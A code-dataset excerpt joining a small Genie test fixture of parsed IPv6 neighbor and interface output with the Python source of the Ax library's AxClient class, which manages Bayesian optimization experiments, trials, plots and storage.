mapper = TestMapper(Rest(airtemp_ds).app)
with pytest.raises(KeyError):
_ = mapper['notakey']
| 24.206897 | 74 | 0.754986 |
4a20fdc77aa3edd0dae77b67e1c753ae421883ec | 3,152 | py | Python | pkgs/ops-pkg/src/genie/libs/ops/nd/iosxe/tests/nd_output.py | jbronikowski/genielibs | 200a34e5fe4838a27b5a80d5973651b2e34ccafb | [
"Apache-2.0"
] | 94 | 2018-04-30T20:29:15.000Z | 2022-03-29T13:40:31.000Z | pkgs/ops-pkg/src/genie/libs/ops/nd/iosxe/tests/nd_output.py | jbronikowski/genielibs | 200a34e5fe4838a27b5a80d5973651b2e34ccafb | [
"Apache-2.0"
] | 67 | 2018-12-06T21:08:09.000Z | 2022-03-29T18:00:46.000Z | pkgs/ops-pkg/src/genie/libs/ops/nd/iosxe/tests/nd_output.py | jbronikowski/genielibs | 200a34e5fe4838a27b5a80d5973651b2e34ccafb | [
"Apache-2.0"
] | 49 | 2018-06-29T18:59:03.000Z | 2022-03-10T02:07:59.000Z | '''
Nd Genie Ops Object Outputs for IOSXE.
'''
class NdOutput(object):
ShowIpv6Neighbors = {
"interface": {
"GigabitEthernet2.90": {
"interface": "GigabitEthernet2.90",
"neighbors": {
"FE80::F816:3EFF:FE0F:B2EC": {
"age": "2",
"ip": "FE80::F816:3EFF:FE0F:B2EC",
"link_layer_address": "fa16.3e0f.b2ec",
"neighbor_state": "STALE"
}
}
}
}
}
ShowIpv6Interface = {
"GigabitEthernet2.90": {
"enabled": True,
"oper_status": "up",
"ipv6": {
"FE80::F816:3EFF:FE26:1224": {
"ip": "FE80::F816:3EFF:FE26:1224",
"origin": "link_layer",
"status": "valid"
},
"2001:10:12:90::1/64": {
"ip": "2001:10:12:90::1",
"prefix_length": "64",
"status": "valid"
},
"enabled": True,
"icmp": {
"error_messages_limited": 100,
"redirects": True,
"unreachables": "sent"
},
"nd": {
"suppress": False,
"dad_enabled": True,
"dad_attempts": 1,
"reachable_time": 30000,
"using_time": 30000,
"advertised_reachable_time": 0,
"advertised_reachable_time_unspecified": True,
"advertised_retransmit_interval": 0,
"advertised_retransmit_interval_unspecified": True,
"router_advertisements_interval": 200,
"router_advertisements_live": 1800,
"advertised_default_router_preference": "Medium"
}
},
"joined_group_addresses": [
"FF02::1",
"FF02::16",
"FF02::1:FF00:1",
"FF02::1:FF26:1224",
"FF02::2",
"FF02::A",
"FF02::D"
],
"mtu": 1500,
"addresses_config_method": "stateless autoconfig"
}
}
ndOpsOutput = {
'interface':{
'GigabitEthernet2.90':{
'interface': 'GigabitEthernet2.90',
"router_advertisement": {
"interval": 200,
"suppress": False,
"lifetime": 1800,
},
'neighbors': {
"FE80::F816:3EFF:FE0F:B2EC": {
"age": "2",
"ip": "FE80::F816:3EFF:FE0F:B2EC",
"link_layer_address": "fa16.3e0f.b2ec",
"neighbor_state": "STALE",
},
},
},
},
}
| 33.892473 | 72 | 0.36453 |
4a20fe60583f7103dfbfc1bd6af4d10ca1d15175 | 44,875 | py | Python | ax/service/ax_client.py | EricZLou/Ax | 3f8fc6f4a055e93cb69fda3799be41ee9572ef02 | [
"MIT"
] | null | null | null | ax/service/ax_client.py | EricZLou/Ax | 3f8fc6f4a055e93cb69fda3799be41ee9572ef02 | [
"MIT"
] | null | null | null | ax/service/ax_client.py | EricZLou/Ax | 3f8fc6f4a055e93cb69fda3799be41ee9572ef02 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import json
import logging
import warnings
from typing import Any, Dict, List, Optional, Tuple, Union
import ax.service.utils.best_point as best_point_utils
import numpy as np
import pandas as pd
from ax.core.arm import Arm
from ax.core.base_trial import BaseTrial
from ax.core.batch_trial import BatchTrial
from ax.core.data import Data
from ax.core.experiment import Experiment
from ax.core.generator_run import GeneratorRun
from ax.core.trial import Trial
from ax.core.types import (
TEvaluationOutcome,
TModelPredictArm,
TParameterization,
TParamValue,
)
from ax.modelbridge.dispatch_utils import choose_generation_strategy
from ax.modelbridge.generation_strategy import GenerationStrategy
from ax.modelbridge.modelbridge_utils import get_pending_observation_features
from ax.plot.base import AxPlotConfig
from ax.plot.contour import plot_contour
from ax.plot.exp_utils import exp_to_df
from ax.plot.feature_importances import plot_feature_importance_by_feature
from ax.plot.helper import _format_dict, _get_in_sample_arms
from ax.plot.trace import optimization_trace_single_method
from ax.service.utils.instantiation import (
data_from_evaluations,
make_experiment,
raw_data_to_evaluation,
)
from ax.service.utils.with_db_settings_base import DBSettings, WithDBSettingsBase
from ax.storage.json_store.decoder import (
generation_strategy_from_json,
object_from_json,
)
from ax.storage.json_store.encoder import object_to_json
from ax.utils.common.docutils import copy_doc
from ax.utils.common.logger import _round_floats_for_logging, get_logger
from ax.utils.common.typeutils import (
checked_cast,
checked_cast_dict,
checked_cast_optional,
not_none,
)
from botorch.utils.sampling import manual_seed
logger = get_logger(__name__)
class AxClient(WithDBSettingsBase):
"""
Convenience handler for management of experimentation cycle through a
service-like API. External system manages scheduling of the cycle and makes
calls to this client to get next suggestion in the experiment and log back
data from the evaluation of that suggestion.
Note: `AxClient` expects to only propose 1 arm (suggestion) per trial; support
for use cases that require use of batches is coming soon.
Two custom types used in this class for convenience are `TParamValue` and
`TParameterization`. Those are shortcuts for `Union[str, bool, float, int]`
and `Dict[str, Union[str, bool, float, int]]`, respectively.
Args:
generation_strategy: Optional generation strategy. If not set, one is
intelligently chosen based on properties of search space.
db_settings: Settings for saving and reloading the underlying experiment
to a database. Expected to be of type
ax.storage.sqa_store.structs.DBSettings and require SQLAlchemy.
enforce_sequential_optimization: Whether to enforce that when it is
reasonable to switch models during the optimization (as prescribed
by `num_trials` in generation strategy), Ax will wait for enough trials
to be completed with data to proceed. Defaults to True. If set to
False, Ax will keep generating new trials from the previous model
until enough data is gathered. Use this only if necessary;
otherwise, it is more resource-efficient to
optimize sequentially, by waiting until enough data is available to
use the next model.
random_seed: Optional integer random seed, set to fix the optimization
random seed for reproducibility. Works only for Sobol quasi-random
generator and for BoTorch-powered models. For the latter models, the
trials generated from the same optimization setup with the same seed,
will be mostly similar, but the exact parameter values may still vary
and trials latter in the optimizations will diverge more and more.
This is because a degree of randomness is essential for high performance
of the Bayesian optimization models and is not controlled by the seed.
Note: In multi-threaded environments, the random seed is thread-safe,
but does not actually guarantee reproducibility. Whether the outcomes
will be exactly the same for two same operations that use the random
seed, depends on whether the threads modify the random state in the
same order across the two operations.
verbose_logging: Whether Ax should log significant optimization events,
defaults to `True`.
suppress_storage_errors: Whether to suppress SQL storage-related errors if
encounted. Only use if SQL storage is not important for the given use
case, since this will only log, but not raise, an exception if its
encountered while saving to DB or loading from it.
"""
def __init__(
self,
generation_strategy: Optional[GenerationStrategy] = None,
db_settings: Optional[DBSettings] = None,
enforce_sequential_optimization: bool = True,
random_seed: Optional[int] = None,
verbose_logging: bool = True,
suppress_storage_errors: bool = False,
) -> None:
super().__init__(db_settings=db_settings)
if not verbose_logging:
logger.setLevel(logging.WARNING) # pragma: no cover
else:
logger.info(
"Starting optimization with verbose logging. To disable logging, "
"set the `verbose_logging` argument to `False`. Note that float "
"values in the logs are rounded to 2 decimal points."
)
self._generation_strategy = generation_strategy
self._experiment: Optional[Experiment] = None
self._enforce_sequential_optimization = enforce_sequential_optimization
self._random_seed = random_seed
self._suppress_storage_errors = suppress_storage_errors
if random_seed is not None:
logger.warning(
f"Random seed set to {random_seed}. Note that this setting "
"only affects the Sobol quasi-random generator "
"and BoTorch-powered Bayesian optimization models. For the latter "
"models, setting random seed to the same number for two optimizations "
"will make the generated trials similar, but not exactly the same, "
"and over time the trials will diverge more."
)
# ------------------------ Public API methods. ------------------------
def create_experiment(
self,
parameters: List[Dict[str, Union[TParamValue, List[TParamValue]]]],
name: Optional[str] = None,
objective_name: Optional[str] = None,
minimize: bool = False,
parameter_constraints: Optional[List[str]] = None,
outcome_constraints: Optional[List[str]] = None,
status_quo: Optional[TParameterization] = None,
overwrite_existing_experiment: bool = False,
experiment_type: Optional[str] = None,
choose_generation_strategy_kwargs: Optional[Dict[str, Any]] = None,
) -> None:
"""Create a new experiment and save it if DBSettings available.
Args:
parameters: List of dictionaries representing parameters in the
experiment search space. Required elements in the dictionaries
are: "name" (name of this parameter, string), "type" (type of the
parameter: "range", "fixed", or "choice", string), and "bounds"
for range parameters (list of two values, lower bound first),
"values" for choice parameters (list of values), and "value" for
fixed parameters (single value).
objective: Name of the metric used as objective in this experiment.
This metric must be present in `raw_data` argument to `complete_trial`.
name: Name of the experiment to be created.
minimize: Whether this experiment represents a minimization problem.
parameter_constraints: List of string representation of parameter
constraints, such as "x3 >= x4" or "-x3 + 2*x4 - 3.5*x5 >= 2". For
the latter constraints, any number of arguments is accepted, and
acceptable operators are "<=" and ">=".
outcome_constraints: List of string representation of outcome
constraints of form "metric_name >= bound", like "m1 <= 3."
status_quo: Parameterization of the current state of the system.
If set, this will be added to each trial to be evaluated alongside
test configurations.
overwrite_existing_experiment: If an experiment has already been set
on this `AxClient` instance, whether to reset it to the new one.
If overwriting the experiment, generation strategy will be
re-selected for the new experiment and restarted.
To protect experiments in production, one cannot overwrite existing
experiments if the experiment is already stored in the database,
regardless of the value of `overwrite_existing_experiment`.
choose_generation_strategy_kwargs: Keyword arguments to pass to
`choose_generation_strategy` function which determines what
generation strategy should be used when none was specified on init.
"""
if self.db_settings_set and not name:
raise ValueError( # pragma: no cover
"Must give the experiment a name if `db_settings` is not None."
)
if self.db_settings_set:
experiment, _ = self._load_experiment_and_generation_strategy(
experiment_name=not_none(name)
)
if experiment:
raise ValueError(
f"Experiment {name} already exists in the database. "
"To protect experiments that are running in production, "
"overwriting stored experiments is not allowed. To "
"start a new experiment and store it, change the "
"experiment's name."
)
if self._experiment is not None:
if overwrite_existing_experiment:
exp_name = self.experiment._name or "untitled"
new_exp_name = name or "untitled"
logger.info(
f"Overwriting existing experiment ({exp_name}) on this client "
f"with new experiment ({new_exp_name}) and restarting the "
"generation strategy."
)
self._generation_strategy = None
else:
raise ValueError(
"Experiment already created for this client instance. "
"Set the `overwrite_existing_experiment` to `True` to overwrite "
"with new experiment."
)
self._experiment = make_experiment(
name=name,
parameters=parameters,
objective_name=objective_name,
minimize=minimize,
parameter_constraints=parameter_constraints,
outcome_constraints=outcome_constraints,
status_quo=status_quo,
experiment_type=experiment_type,
)
try:
self._save_experiment_to_db_if_possible(
experiment=self.experiment,
suppress_all_errors=self._suppress_storage_errors,
)
except Exception:
# Unset the experiment on this `AxClient` instance if encountered and
# raising an error from saving the experiment, to avoid a case where
# overall `create_experiment` call fails with a storage error, but
# `self._experiment` is still set and user has to specify the
# `ooverwrite_existing_experiment` kwarg to re-attempt exp. creation.
self._experiment = None
raise
self._set_generation_strategy(
choose_generation_strategy_kwargs=choose_generation_strategy_kwargs
)
self._save_generation_strategy_to_db_if_possible(
generation_strategy=self.generation_strategy,
suppress_all_errors=self._suppress_storage_errors,
)
def get_next_trial(self) -> Tuple[TParameterization, int]:
"""
Generate trial with the next set of parameters to try in the iteration process.
Note: Service API currently supports only 1-arm trials.
Returns:
Tuple of trial parameterization, trial index
"""
trial = self.experiment.new_trial(generator_run=self._gen_new_generator_run())
logger.info(
f"Generated new trial {trial.index} with parameters "
f"{_round_floats_for_logging(item=not_none(trial.arm).parameters)}."
)
trial.mark_running(no_runner_required=True)
self._save_new_trial_to_db_if_possible(
experiment=self.experiment,
trial=trial,
suppress_all_errors=self._suppress_storage_errors,
)
self._save_generation_strategy_to_db_if_possible(
generation_strategy=self.generation_strategy,
suppress_all_errors=self._suppress_storage_errors,
)
return not_none(trial.arm).parameters, trial.index
def abandon_trial(self, trial_index: int, reason: Optional[str] = None) -> None:
"""Abandons a trial and adds optional metadata to it.
Args:
trial_index: Index of trial within the experiment.
"""
trial = self._get_trial(trial_index=trial_index)
trial.mark_abandoned(reason=reason)
def complete_trial(
self,
trial_index: int,
raw_data: TEvaluationOutcome,
metadata: Optional[Dict[str, Union[str, int]]] = None,
sample_size: Optional[int] = None,
) -> None:
"""
Completes the trial with given metric values and adds optional metadata
to it.
Args:
trial_index: Index of trial within the experiment.
raw_data: Evaluation data for the trial. Can be a mapping from
metric name to a tuple of mean and SEM, just a tuple of mean and
SEM if only one metric in optimization, or just the mean if there
is no SEM. Can also be a list of (fidelities, mapping from
metric name to a tuple of mean and SEM).
metadata: Additional metadata to track about this run.
sample_size: Number of samples collected for the underlying arm,
optional.
"""
# Validate that trial can be completed.
if not isinstance(trial_index, int): # pragma: no cover
raise ValueError(f"Trial index must be an int, got: {trial_index}.")
trial = self._get_trial(trial_index=trial_index)
self._validate_can_complete_trial(trial=trial)
# Format the data to save.
sample_sizes = {not_none(trial.arm).name: sample_size} if sample_size else {}
evaluations, data = self._make_evaluations_and_data(
trial=trial, raw_data=raw_data, metadata=metadata, sample_sizes=sample_sizes
)
trial._run_metadata = metadata or {}
self.experiment.attach_data(data=data)
trial.mark_completed()
data_for_logging = _round_floats_for_logging(
item=evaluations[next(iter(evaluations.keys()))]
)
logger.info(
f"Completed trial {trial_index} with data: "
f"{_round_floats_for_logging(item=data_for_logging)}."
)
self._save_updated_trial_to_db_if_possible(
experiment=self.experiment,
trial=trial,
suppress_all_errors=self._suppress_storage_errors,
)
def update_trial_data(
self,
trial_index: int,
raw_data: TEvaluationOutcome,
metadata: Optional[Dict[str, Union[str, int]]] = None,
sample_size: Optional[int] = None,
) -> None:
"""
Attaches additional data for completed trial (for example, if trial was
completed with data for only one of the required metrics and more data
needs to be attached).
Args:
trial_index: Index of trial within the experiment.
raw_data: Evaluation data for the trial. Can be a mapping from
metric name to a tuple of mean and SEM, just a tuple of mean and
SEM if only one metric in optimization, or just the mean if there
is no SEM. Can also be a list of (fidelities, mapping from
metric name to a tuple of mean and SEM).
metadata: Additional metadata to track about this run.
sample_size: Number of samples collected for the underlying arm,
optional.
"""
assert isinstance(
trial_index, int
), f"Trial index must be an int, got: {trial_index}." # pragma: no cover
trial = self._get_trial(trial_index=trial_index)
if not trial.status.is_completed:
raise ValueError(
f"Trial {trial.index} has not yet been completed with data."
"To complete it, use `ax_client.complete_trial`."
)
sample_sizes = {not_none(trial.arm).name: sample_size} if sample_size else {}
evaluations, data = self._make_evaluations_and_data(
trial=trial, raw_data=raw_data, metadata=metadata, sample_sizes=sample_sizes
)
trial._run_metadata.update(metadata or {})
# Registering trial data update is needed for generation strategies that
# leverage the `update` functionality of model and bridge setup and therefore
# need to be aware of new data added to experiment. Usually this happends
# seamlessly, by looking at newly completed trials, but in this case trial
# status does not change, so we manually register the new data.
# Currently this call will only result in a `NotImplementedError` if generation
# strategy uses `update` (`GenerationStep.use_update` is False by default).
self.generation_strategy._register_trial_data_update(trial=trial, data=data)
self.experiment.attach_data(data, combine_with_last_data=True)
data_for_logging = _round_floats_for_logging(
item=evaluations[next(iter(evaluations.keys()))]
)
logger.info(
f"Added data: {_round_floats_for_logging(item=data_for_logging)} "
f"to trial {trial.index}."
)
self._save_experiment_to_db_if_possible(
experiment=self.experiment,
suppress_all_errors=self._suppress_storage_errors,
)
def log_trial_failure(
self, trial_index: int, metadata: Optional[Dict[str, str]] = None
) -> None:
"""Mark that the given trial has failed while running.
Args:
trial_index: Index of trial within the experiment.
metadata: Additional metadata to track about this run.
"""
trial = self.experiment.trials[trial_index]
trial.mark_failed()
logger.info(f"Registered failure of trial {trial_index}.")
if metadata is not None:
trial._run_metadata = metadata
self._save_experiment_to_db_if_possible(
experiment=self.experiment,
suppress_all_errors=self._suppress_storage_errors,
)
def attach_trial(
self, parameters: TParameterization
) -> Tuple[TParameterization, int]:
"""Attach a new trial with the given parameterization to the experiment.
Args:
parameters: Parameterization of the new trial.
Returns:
Tuple of parameterization and trial index from newly created trial.
"""
self._validate_search_space_membership(parameters=parameters)
trial = self.experiment.new_trial().add_arm(Arm(parameters=parameters))
trial.mark_running(no_runner_required=True)
logger.info(
"Attached custom parameterization "
f"{_round_floats_for_logging(item=parameters)} as trial {trial.index}."
)
self._save_new_trial_to_db_if_possible(
experiment=self.experiment,
trial=trial,
suppress_all_errors=self._suppress_storage_errors,
)
return not_none(trial.arm).parameters, trial.index
def get_trial_parameters(self, trial_index: int) -> TParameterization:
"""Retrieve the parameterization of the trial by the given index."""
return not_none(self._get_trial(trial_index).arm).parameters
@copy_doc(best_point_utils.get_best_parameters)
def get_best_parameters(
self,
) -> Optional[Tuple[TParameterization, Optional[TModelPredictArm]]]:
return best_point_utils.get_best_parameters(self.experiment)
def get_trials_data_frame(self) -> pd.DataFrame:
return exp_to_df(exp=self.experiment)
def get_max_parallelism(self) -> List[Tuple[int, int]]:
"""Retrieves maximum number of trials that can be scheduled in parallel
at different stages of optimization.
Some optimization algorithms profit significantly from sequential
optimization (i.e. suggest a few points, get updated with data for them,
repeat, see https://ax.dev/docs/bayesopt.html).
Parallelism setting indicates how many trials should be running simulteneously
(generated, but not yet completed with data).
The output of this method is mapping of form
{num_trials -> max_parallelism_setting}, where the max_parallelism_setting
is used for num_trials trials. If max_parallelism_setting is -1, as
many of the trials can be ran in parallel, as necessary. If num_trials
in a tuple is -1, then the corresponding max_parallelism_setting
should be used for all subsequent trials.
For example, if the returned list is [(5, -1), (12, 6), (-1, 3)],
the schedule could be: run 5 trials with any parallelism, run 6 trials in
parallel twice, run 3 trials in parallel for as long as needed. Here,
'running' a trial means obtaining a next trial from `AxClient` through
get_next_trials and completing it with data when available.
Returns:
Mapping of form {num_trials -> max_parallelism_setting}.
"""
parallelism_settings = []
for step in self.generation_strategy._steps:
parallelism_settings.append(
(step.num_trials, step.max_parallelism or step.num_trials)
)
return parallelism_settings
def get_optimization_trace(
self, objective_optimum: Optional[float] = None
) -> AxPlotConfig:
"""Retrieves the plot configuration for optimization trace, which shows
the evolution of the objective mean over iterations.
Args:
objective_optimum: Optimal objective, if known, for display in the
visualization.
"""
if not self.experiment.trials:
raise ValueError("Cannot generate plot as there are no trials.")
objective_name = self.experiment.optimization_config.objective.metric.name
best_objectives = np.array(
[
[
checked_cast(Trial, trial).objective_mean
for trial in self.experiment.trials.values()
]
]
)
hover_labels = [
_format_dict(not_none(checked_cast(Trial, trial).arm).parameters)
for trial in self.experiment.trials.values()
]
return optimization_trace_single_method(
y=(
np.minimum.accumulate(best_objectives, axis=1)
if self.experiment.optimization_config.objective.minimize
else np.maximum.accumulate(best_objectives, axis=1)
),
optimum=objective_optimum,
title="Model performance vs. # of iterations",
ylabel=objective_name.capitalize(),
hover_labels=hover_labels,
)
def get_contour_plot(
self,
param_x: Optional[str] = None,
param_y: Optional[str] = None,
metric_name: Optional[str] = None,
) -> AxPlotConfig:
"""Retrieves a plot configuration for a contour plot of the response
surface. For response surfaces with more than two parameters,
selected two parameters will appear on the axes, and remaining parameters
will be affixed to the middle of their range. If contour params arguments
are not provided, the first two parameters in the search space will be
used. If contour metrics are not provided, objective will be used.
Args:
param_x: name of parameters to use on x-axis for
the contour response surface plots.
param_y: name of parameters to use on y-axis for
the contour response surface plots.
metric_name: Name of the metric, for which to plot the response
surface.
"""
if not self.experiment.trials:
raise ValueError("Cannot generate plot as there are no trials.")
if len(self.experiment.parameters) < 2:
raise ValueError(
"Cannot create a contour plot as experiment has less than 2 "
"parameters, but a contour-related argument was provided."
)
if (param_x or param_y) and not (param_x and param_y):
raise ValueError(
"If `param_x` is provided, `param_y` is "
"required as well, and vice-versa."
)
objective_name = self.objective_name
if not metric_name:
metric_name = objective_name
if not param_x or not param_y:
parameter_names = list(self.experiment.parameters.keys())
param_x = parameter_names[0]
param_y = parameter_names[1]
if param_x not in self.experiment.parameters:
raise ValueError(
f'Parameter "{param_x}" not found in the optimization search space.'
)
if param_y not in self.experiment.parameters:
raise ValueError(
f'Parameter "{param_y}" not found in the optimization search space.'
)
if metric_name not in self.experiment.metrics:
raise ValueError(
f'Metric "{metric_name}" is not associated with this optimization.'
)
if self.generation_strategy.model is not None:
try:
logger.info(
f"Retrieving contour plot with parameter '{param_x}' on X-axis "
f"and '{param_y}' on Y-axis, for metric '{metric_name}'. "
"Ramaining parameters are affixed to the middle of their range."
)
return plot_contour(
model=not_none(self.generation_strategy.model),
param_x=param_x,
param_y=param_y,
metric_name=metric_name,
)
except NotImplementedError:
# Some models don't implement '_predict', which is needed
# for the contour plots.
logger.info(
f"Model {self.generation_strategy.model} does not implement "
"`predict`, so it cannot be used to generate a response "
"surface plot."
)
raise ValueError(
f'Could not obtain contour plot of "{metric_name}" for parameters '
f'"{param_x}" and "{param_y}", as a model with predictive ability, '
"such as a Gaussian Process, has not yet been trained in the course "
"of this optimization."
)
def get_feature_importances(self, relative: bool = True) -> AxPlotConfig:
"""
Get a bar chart showing feature_importances for a metric.
A drop-down controls the metric for which the importances are displayed.
Args:
relative: Whether the values are displayed as percentiles or
as raw importance metrics.
"""
if not self.experiment.trials:
raise ValueError("Cannot generate plot as there are no trials.")
cur_model = self.generation_strategy.model
if cur_model is not None:
try:
return plot_feature_importance_by_feature(cur_model, relative=relative)
except NotImplementedError:
logger.info(
f"Model {self.generation_strategy.model} does not implement "
"`feature_importances`, so it cannot be used to generate "
"this plot. Only certain models, specifically GPEI, implement "
"feature importances."
)
raise ValueError(
"Could not obtain feature_importances for any metrics "
" as a model that can produce feature importances, such as a "
"Gaussian Process, has not yet been trained in the course "
"of this optimization."
)
def load_experiment_from_database(
self,
experiment_name: str,
choose_generation_strategy_kwargs: Optional[Dict[str, Any]] = None,
) -> None:
"""Load an existing experiment from database using the `DBSettings`
passed to this `AxClient` on instantiation.
Args:
experiment_name: Name of the experiment.
Returns:
Experiment object.
"""
experiment, generation_strategy = self._load_experiment_and_generation_strategy(
experiment_name=experiment_name
)
if experiment is None:
raise ValueError(f"Experiment by name '{experiment_name}' not found.")
self._experiment = experiment
logger.info(f"Loaded {experiment}.")
if generation_strategy is None: # pragma: no cover
self._set_generation_strategy(
choose_generation_strategy_kwargs=choose_generation_strategy_kwargs
)
else:
self._generation_strategy = generation_strategy
logger.info(
f"Using generation strategy associated with the loaded experiment:"
f" {generation_strategy}."
)
def get_model_predictions(
self, metric_names: Optional[List[str]] = None
) -> Dict[int, Dict[str, Tuple[float, float]]]:
"""Retrieve model-estimated means and covariances for all metrics.
Note: this function retrieves the predictions for the 'in-sample' arms,
which means that the return mapping on this function will only contain
predictions for trials that have been completed with data.
Args:
metric_names: Names of the metrics, for which to retrieve predictions.
All metrics on experiment will be retrieved if this argument was
not specified.
Returns:
A mapping from trial index to a mapping of metric names to tuples
of predicted metric mean and SEM, of form:
{ trial_index -> { metric_name: ( mean, SEM ) } }.
"""
if self.generation_strategy.model is None: # pragma: no cover
raise ValueError("No model has been instantiated yet.")
if metric_names is None and self.experiment.metrics is None:
raise ValueError( # pragma: no cover
"No metrics to retrieve specified on the experiment or as "
"argument to `get_model_predictions`."
)
arm_info, _, _ = _get_in_sample_arms(
model=not_none(self.generation_strategy.model),
metric_names=set(metric_names)
if metric_names is not None
else set(not_none(self.experiment.metrics).keys()),
)
trials = checked_cast_dict(int, Trial, self.experiment.trials)
return {
trial_index: {
m: (
arm_info[not_none(trials[trial_index].arm).name].y_hat[m],
arm_info[not_none(trials[trial_index].arm).name].se_hat[m],
)
for m in arm_info[not_none(trials[trial_index].arm).name].y_hat
}
for trial_index in trials
if not_none(trials[trial_index].arm).name in arm_info
}
def verify_trial_parameterization(
self, trial_index: int, parameterization: TParameterization
) -> bool:
"""Whether the given parameterization matches that of the arm in the trial
specified in the trial index.
"""
return (
not_none(self._get_trial(trial_index=trial_index).arm).parameters
== parameterization
)
# ------------------ JSON serialization & storage methods. -----------------
def save_to_json_file(self, filepath: str = "ax_client_snapshot.json") -> None:
"""Save a JSON-serialized snapshot of this `AxClient`'s settings and state
to a .json file by the given path.
"""
with open(filepath, "w+") as file: # pragma: no cover
file.write(json.dumps(self.to_json_snapshot()))
logger.info(f"Saved JSON-serialized state of optimization to `{filepath}`.")
@staticmethod
def load_from_json_file(
filepath: str = "ax_client_snapshot.json", **kwargs
) -> "AxClient":
"""Restore an `AxClient` and its state from a JSON-serialized snapshot,
residing in a .json file by the given path.
"""
with open(filepath, "r") as file: # pragma: no cover
serialized = json.loads(file.read())
return AxClient.from_json_snapshot(serialized=serialized, **kwargs)
def to_json_snapshot(self) -> Dict[str, Any]:
"""Serialize this `AxClient` to JSON to be able to interrupt and restart
optimization and save it to file by the provided path.
Returns:
A JSON-safe dict representation of this `AxClient`.
"""
return {
"_type": self.__class__.__name__,
"experiment": object_to_json(self._experiment),
"generation_strategy": object_to_json(self._generation_strategy),
"_enforce_sequential_optimization": self._enforce_sequential_optimization,
}
@staticmethod
def from_json_snapshot(serialized: Dict[str, Any], **kwargs) -> "AxClient":
"""Recreate an `AxClient` from a JSON snapshot."""
experiment = object_from_json(serialized.pop("experiment"))
serialized_generation_strategy = serialized.pop("generation_strategy")
ax_client = AxClient(
generation_strategy=generation_strategy_from_json(
generation_strategy_json=serialized_generation_strategy
)
if serialized_generation_strategy is not None
else None,
enforce_sequential_optimization=serialized.pop(
"_enforce_sequential_optimization"
),
**kwargs,
)
ax_client._experiment = experiment
return ax_client
# ---------------------- Private helper methods. ---------------------
@property
def experiment(self) -> Experiment:
"""Returns the experiment set on this Ax client."""
if self._experiment is None:
raise ValueError(
"Experiment not set on Ax client. Must first "
"call load_experiment or create_experiment to use handler functions."
)
return not_none(self._experiment)
@property
def generation_strategy(self) -> GenerationStrategy:
"""Returns the generation strategy, set on this experiment."""
if self._generation_strategy is None:
raise ValueError(
"No generation strategy has been set on this optimization yet."
)
return not_none(self._generation_strategy)
@property
def objective_name(self) -> str:
"""Returns the name of the objective in this optimization."""
opt_config = not_none(self.experiment.optimization_config)
return opt_config.objective.metric.name
def _set_generation_strategy(
self, choose_generation_strategy_kwargs: Optional[Dict[str, Any]] = None
) -> None:
"""Selects the generation strategy and applies specified dispatch kwargs,
if any.
"""
choose_generation_strategy_kwargs = choose_generation_strategy_kwargs or {}
random_seed = choose_generation_strategy_kwargs.pop(
"random_seed", self._random_seed
)
enforce_sequential_optimization = choose_generation_strategy_kwargs.pop(
"enforce_sequential_optimization", self._enforce_sequential_optimization
)
if self._generation_strategy is None:
self._generation_strategy = choose_generation_strategy(
search_space=self.experiment.search_space,
enforce_sequential_optimization=enforce_sequential_optimization,
random_seed=random_seed,
**choose_generation_strategy_kwargs,
)
def _gen_new_generator_run(self, n: int = 1) -> GeneratorRun:
"""Generate new generator run for this experiment.
Args:
n: Number of arms to generate.
"""
# If random seed is not set for this optimization, context manager does
# nothing; otherwise, it sets the random seed for torch, but only for the
# scope of this call. This is important because torch seed is set globally,
# so if we just set the seed without the context manager, it can have
# serious negative impact on the performance of the models that employ
# stochasticity.
with manual_seed(seed=self._random_seed) and warnings.catch_warnings():
# Filter out GPYTorch warnings to avoid confusing users.
warnings.simplefilter("ignore")
return not_none(self.generation_strategy).gen(
experiment=self.experiment,
n=n,
pending_observations=get_pending_observation_features(
experiment=self.experiment
),
)
def _get_trial(self, trial_index: int) -> Trial:
"""Gets trial by given index or raises an error if it does not exist."""
if trial_index in self.experiment.trials:
trial = self.experiment.trials.get(trial_index)
if not isinstance(trial, Trial):
raise NotImplementedError(
"`AxClient` only supports `Trial`, not `BatchTrial`."
)
return trial
raise ValueError(f"Trial {trial_index} does not yet exist.")
def _find_last_trial_with_parameterization(
self, parameterization: TParameterization
) -> int:
"""Given a parameterization, find the last trial in the experiment that
contains an arm with that parameterization.
"""
for trial_idx in sorted(self.experiment.trials.keys(), reverse=True):
if not_none(self._get_trial(trial_idx).arm).parameters == parameterization:
return trial_idx
raise ValueError(
f"No trial on experiment matches parameterization {parameterization}."
)
def _make_evaluations_and_data(
self,
trial: BaseTrial,
raw_data: Union[TEvaluationOutcome, Dict[str, TEvaluationOutcome]],
metadata: Optional[Dict[str, Union[str, int]]],
sample_sizes: Optional[Dict[str, int]] = None,
) -> Tuple[Dict[str, TEvaluationOutcome], Data]:
"""Formats given raw data as Ax evaluations and `Data`.
Args:
trial: Trial within the experiment.
raw_data: Metric outcomes for 1-arm trials, map from arm name to
metric outcomes for batched trials.
sample_size: Integer sample size for 1-arm trials, dict from arm
name to sample size for batched trials. Optional.
metadata: Additional metadata to track about this run.
data_is_for_batched_trials: Whether making evaluations and data for
a batched trial or a 1-arm trial.
"""
if isinstance(trial, BatchTrial):
assert isinstance( # pragma: no cover
raw_data, dict
), "Raw data must be a dict for batched trials."
elif isinstance(trial, Trial):
arm_name = not_none(trial.arm).name
raw_data = {arm_name: raw_data} # pyre-ignore[9]
else: # pragma: no cover
raise ValueError(f"Unexpected trial type: {type(trial)}.")
assert isinstance(raw_data, dict)
evaluations = {
arm_name: raw_data_to_evaluation(
raw_data=raw_data[arm_name], objective_name=self.objective_name
)
for arm_name in raw_data
}
data = data_from_evaluations(
evaluations=evaluations,
trial_index=trial.index,
sample_sizes=sample_sizes or {},
start_time=(
checked_cast_optional(int, metadata.get("start_time"))
if metadata is not None
else None
),
end_time=(
checked_cast_optional(int, metadata.get("end_time"))
if metadata is not None
else None
),
)
return evaluations, data
# ------------------------------ Validators. -------------------------------
@staticmethod
def _validate_can_complete_trial(trial: BaseTrial) -> None:
if trial.status.is_completed:
raise ValueError(
f"Trial {trial.index} has already been completed with data."
"To add more data to it (for example, for a different metric), "
"use `ax_client.update_trial_data`."
)
if trial.status.is_abandoned or trial.status.is_failed:
raise ValueError(
f"Trial {trial.index} has been marked {trial.status.name}, so it "
"no longer expects data."
)
def _validate_search_space_membership(self, parameters: TParameterization) -> None:
self.experiment.search_space.check_membership(
parameterization=parameters, raise_error=True
)
# `check_membership` uses int and float interchangeably, which we don't
# want here.
